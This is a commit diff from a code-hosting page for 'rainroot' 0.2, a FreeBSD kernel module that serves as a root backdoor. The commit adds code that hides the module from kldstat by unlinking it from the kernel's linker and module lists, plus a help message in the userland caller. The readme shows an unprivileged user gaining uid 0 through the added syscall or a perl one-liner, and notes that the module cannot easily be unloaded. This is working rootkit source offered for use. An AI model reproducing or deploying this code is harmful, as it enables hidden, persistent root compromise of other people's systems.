dash/FreeBSD
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

version 0.2, added hidefunction so mod is not found anymore easily

Browse Source
This commit is contained in:
your-favorite-hacker
2015-07-05 21:24:41 +02:00
parent 60bdcc8bed
commit 0fc9a7e995
4 changed files with 111 additions and 19 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
rainroot/Makefile
View File

@@ -2,7 +2,7 @@
# $FreeBSD: src/share/examples/kld/syscall/module/Makefile,v 1.2 2001/09/18 12:03:42 ru Exp $ # $FreeBSD: src/share/examples/kld/syscall/module/Makefile,v 1.2 2001/09/18 12:03:42 ru Exp $
KMOD= rainroot KMOD= rainroot
SRCS= vnode_if.h\ SRCS= rainroot.c
rainroot.c
.include <bsd.kmod.mk> .include <bsd.kmod.mk>

11
rainroot/caller.c
View File

@@ -4,9 +4,20 @@
#include <sys/syscall.h> #include <sys/syscall.h>
#include <stdlib.h> #include <stdlib.h>
void help(){
printf("rainroot caller\nuse appropiate syscallnumber (default: 210)\nexample: ./caller 210\n\nby dash\n");
}
int main(int argc, char *argv[]){ int main(int argc, char *argv[]){
int scall=-1; int scall=-1;
if(argc<2){
help();
exit(1);
}
scall = atoi(argv[1]); scall = atoi(argv[1]);
syscall(scall); syscall(scall);

74
rainroot/rainroot.c
View File

@@ -2,6 +2,10 @@
instant r00t :) instant r00t :)
ancient code, time to publish ancient code, time to publish
by - by -
added code for hiding the module
basic hide code was built some years back during reading
BSD Rootkits by Joseph Kong, it is quite nice have a look!
*/ */
#include <sys/types.h> #include <sys/types.h>
@@ -15,7 +19,37 @@
#include <sys/linker.h> #include <sys/linker.h>
#include <sys/libkern.h> #include <sys/libkern.h>
#include <sys/sysproto.h> #include <sys/sysproto.h>
#include <sys/lock.h>
#include <sys/mutex.h>
#include <sys/_mutex.h>
#include <sys/sx.h>
#include <vm/vm.h>
#include <vm/vm_page.h>
#include <vm/vm_map.h>
#define HIDEMOD "rainroot.ko"
#define HIDE "rainroot"
extern linker_file_list_t linker_files;
static struct mtx kld_mtx;
extern int next_file_id;
typedef TAILQ_HEAD(,module) modulelist_t;
extern modulelist_t modules;
extern int nextid;
struct module {
TAILQ_ENTRY(module) link;
TAILQ_ENTRY(module) flink;
struct linker_file *file;
int refs;
int id;
char *name;
modeventhand_t handler;
void *arg;
modspecific_t data;
};
/* /*
* The function for implementing the syscall. * The function for implementing the syscall.
@@ -41,20 +75,38 @@ static int offset = NO_SYSCALL;
static int static int
load (struct module *module, int cmd, void *arg) load (struct module *module, int cmd, void *arg)
{ {
int error = 0; struct linker_file *lf;
struct module *mod;
mtx_init(&kld_mtx, "hide lock",NULL,MTX_DEF);
mtx_lock(&Giant);
mtx_lock(&kld_mtx);
switch (cmd) { (&linker_files)->tqh_first->refs--;
case MOD_LOAD :
printf ("call me at %d\n", offset); TAILQ_FOREACH(lf, &linker_files,link)
break; {
case MOD_UNLOAD : if (strcmp(lf->filename,HIDEMOD)==0){
printf ("call me at %d\n", offset); next_file_id--;
break; TAILQ_REMOVE(&linker_files,lf,link);
default :
error = EOPNOTSUPP;
break; break;
} }
return error;
} }
mtx_unlock(&kld_mtx);
mtx_unlock(&Giant);
sx_xlock(&modules_sx);
TAILQ_FOREACH(mod, &modules, link){
if(strcmp(mod->name,HIDE)==0){
nextid--;
TAILQ_REMOVE(&modules,mod,link);
break;
}
}
sx_unlock(&modules_sx);
return(0);
}
SYSCALL_MODULE(syscall, &offset, &gimme_rude_sysent, load, NULL); SYSCALL_MODULE(syscall, &offset, &gimme_rude_sysent, load, NULL);

37
rainroot/readme.txt
View File

@@ -1,29 +1,58 @@
rainr00t rainr00t
======== ========
instant root-priv backd00r via kernelland anyone? instant root-priv backd00r via kernelland anyone? get root and hide the module.
well this module, once loaded gives the thread/user calling instantly root, without spawning an extra well this module, once loaded gives the thread/user calling instantly root, without spawning an extra
shell or alike. shell or alike.
new feature in version 0.2
--------------------------
automaticly hiding the loaded module, be aware that you cant easily unload it now ;)
usage usage
----- -----
kernel
******
root@crashb0x:~/gainroot # uname -a root@crashb0x:~/gainroot # uname -a
FreeBSD crashb0x 10.1-RELEASE FreeBSD 10.1-RELEASE #0 r274401: Tue Nov 11 21:02:49 UTC 2014 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64 FreeBSD crashb0x 10.1-RELEASE FreeBSD 10.1-RELEASE #0 r274401: Tue Nov 11 21:02:49 UTC 2014 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
root@crashb0x:~/gainroot # kldload ./rainroot.ko root@crashb0x:~/gainroot # kldload ./rainroot.ko
root@crashb0x:~/gainroot # kldstat root@crashb0x:~/gainroot # kldstat
Id Refs Address Size Name Id Refs Address Size Name
1 3 0xffffffff80200000 1755658 kernel 1 3 0xffffffff80200000 1755658 kernel
3 1 0xffffffff81a12000 20e rainroot.ko
# userland tool, to call the newly loaded syscall (normally its syscall 210) No rainroot in kldstat, just the default kernel.
userland
********
# userland tool, to call the newly loaded syscall (normally its syscall 210, depending if you got extra syscalls on your box already) In this examples it is syscall nr 211.
compile it
l00ser@crashb0x:/tmp $ gcc48 caller.c -o caller l00ser@crashb0x:/tmp $ gcc48 caller.c -o caller
test for help
# ./caller
rainroot caller
use appropiate syscallnumber (default: 210)
example: ./caller 210
execute and get root
l00ser@crashb0x:/tmp % ./caller 211 l00ser@crashb0x:/tmp % ./caller 211
l00ser@crashb0x:/tmp % id l00ser@crashb0x:/tmp % id
uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser) uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
besides the caller you could also go with every language or operation requesting the syscall. for instance
this perl one-liner:
l00ser@crashb0x:~ % id
uid=1001(l00ser) gid=1001(l00ser) groups=1001(l00ser)
l00ser@crashb0x:~ % perl -e 'syscall(211);'
l00ser@crashb0x:~ % id
uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
author author
------ ------
dash dash